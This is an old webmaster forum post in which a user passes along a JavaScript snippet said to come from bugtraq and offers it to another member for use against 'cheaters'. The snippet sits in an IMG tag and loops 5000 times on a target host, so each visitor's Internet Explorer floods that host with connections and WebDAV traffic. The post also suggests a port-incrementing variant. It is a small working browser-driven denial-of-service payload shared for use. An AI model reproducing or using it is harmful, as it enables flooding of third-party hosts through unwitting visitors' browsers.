View Single Post
Old 10-25-2002, 04:46 PM  
extreme
Confirmed User
 
Industry Role:
Join Date: Oct 2002
Location: lalaland
Posts: 2,120
TheHun, here's a lil snippet of code that was posted on bugtraq some days ago, You might find it usefull ;) ...

[IMG src="javascript"for (i = 1; i <= 5000; i++) {window.location.replace ('file:////www.cheatershost.com/')};')"]

The target will receive a large number connection attempts on port 80. If
port 80 is open on the target IE will also attempt to initiate a WebDAV
session for each request. Resulting in more traffic to the target.

Another way to accomplish this is to use the same peice of javascript but use http://cheatersip: and increment port numbers with the loop.

Cheers,

extreme
extreme is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook